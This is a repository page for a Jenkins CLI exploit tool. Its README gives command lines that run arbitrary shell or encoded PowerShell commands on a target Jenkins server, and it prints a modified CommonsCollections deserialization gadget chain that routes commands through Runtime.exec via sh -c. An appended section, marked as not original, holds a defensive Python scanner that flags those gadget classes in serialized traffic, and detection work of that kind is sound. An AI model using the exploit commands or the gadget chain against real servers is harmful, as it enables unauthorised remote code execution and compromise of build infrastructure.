# jenkins-cli-exploit

**Repository Path**: yuanh_021/jenkins-cli-exploit

## Basic Information

- **Project Name**: jenkins-cli-exploit
- **Description**: No description available
- **Primary Language**: Java
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2017-07-06
- **Last Updated**: 2020-12-19

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

### Vulnerability details

[http://tools.changesec.com/Jenkins-CommonCollections-Exploit/](http://tools.changesec.com/Jenkins-CommonCollections-Exploit/ "Jenkins CommonCollections Exploit Download")

### jenkins-cli-exploit

I spent some time learning how transformers work, and this version supports arbitrary commands!

### Environment setup

```
cpan IPC::Run
```

### Usage

```
./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd '{ whoami; ls -lh; } > /tmp/hacked'
./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd 'powershell -ep bypass -enc xxxxx'
```

A screenshot:

![Screenshot](https://raw.githubusercontent.com/CaledoniaProject/jenkins-cli-exploit/master/contrib/sample.jpg "Desktop screenshot")

### Source code

The official ysoserial implementation has a flaw and cannot correctly execute arbitrary commands. That has been fixed here, and two new Collections are now supported:

```
CommonsCollections1Linux
CommonsCollections1Win
```

The change (you get the idea):

```
// the command is handed to a shell instead of being passed to exec() as a single string
final String[] execArgs = new String[] { "sh", "-c", command };

// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
        new Transformer[]{ new ConstantTransformer(1) });

// real chain for after setup
final Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[0] }),
        new InvokerTransformer("exec",
                new Class[] { String[].class },
                new Object[] { execArgs }),
        new ConstantTransformer(1) };
```

I couldn't be bothered to upload the code; just use the one in lib.

### Legal Disclaimer

Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.
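
A detection check for the transformer classes named in the source code section, as an added example that is not part of the original repository: it scans a request body or capture for Java serialized streams (raw or base64) and reports class descriptors that name those classes. The `org.apache.commons.collections.functors` package prefix, the function names and the sample bytes are assumptions constructed for this example, and the scan is a heuristic, not a full stream parser.

```python
import base64
import re
import struct

# Transformer classes named in the chain above (commons-collections 3.x package, assumed).
GADGET_CLASSES = {
    "org.apache.commons.collections.functors." + n
    for n in ("ChainedTransformer", "ConstantTransformer", "InvokerTransformer")
}
STREAM_MAGIC = b"\xac\xed\x00\x05"                      # Java serialization header
TC_CLASSDESC = 0x72                                     # class descriptor tag
B64_STREAM = re.compile(rb"rO0AB[A-Za-z0-9+/]*={0,2}")  # base64 form of the header
CLASS_NAME = re.compile(r"\[*[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*;?", re.ASCII)

def class_names(data):
    """Heuristic scan: yield names from TC_CLASSDESC records (tag, u16 length, name)."""
    i = 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (n,) = struct.unpack_from(">H", data, i + 1)
            raw = data[i + 3:i + 3 + n]
            if len(raw) == n and CLASS_NAME.fullmatch(raw.decode("latin-1")):
                yield raw.decode("latin-1")
                i += 3 + n
                continue
        i += 1

def serialized_streams(payload):
    """Return candidate streams: raw from the first header, plus decoded base64 runs."""
    streams = []
    start = payload.find(STREAM_MAGIC)
    if start != -1:
        streams.append(payload[start:])
    for m in B64_STREAM.finditer(payload):
        core = m.group().rstrip(b"=")
        core = core[:len(core) - (len(core) % 4 == 1)]  # drop a dangling char of a cut-off run
        streams.append(base64.b64decode(core + b"=" * (-len(core) % 4)))
    return streams

def gadget_hits(payload):
    """Sorted gadget class names referenced by any serialized stream in payload."""
    return sorted({n for s in serialized_streams(payload)
                   for n in class_names(s) if n in GADGET_CLASSES})

def classdesc(name):
    """Constructed record: tag, length, name, zero serialVersionUID, flags, no fields."""
    raw = name.encode()
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw + b"\x00" * 8 + b"\x02\x00\x00"

# Constructed inputs (not captured traffic): a gadget reference, raw and base64, and a benign one.
INVOKER = "org.apache.commons.collections.functors.InvokerTransformer"
RAW_SAMPLE = STREAM_MAGIC + b"\x73" + classdesc(INVOKER) + b"\x78\x70"
B64_SAMPLE = b"body=" + base64.b64encode(RAW_SAMPLE)
BENIGN_SAMPLE = STREAM_MAGIC + b"\x73" + classdesc("java.util.ArrayList") + b"\x78\x70"
```

A hit from `gadget_hits` on traffic bound for a Jenkins endpoint is a signal to investigate and to confirm the instance is patched; an empty result does not prove a payload is absent, since the scan only sees unobfuscated class descriptors.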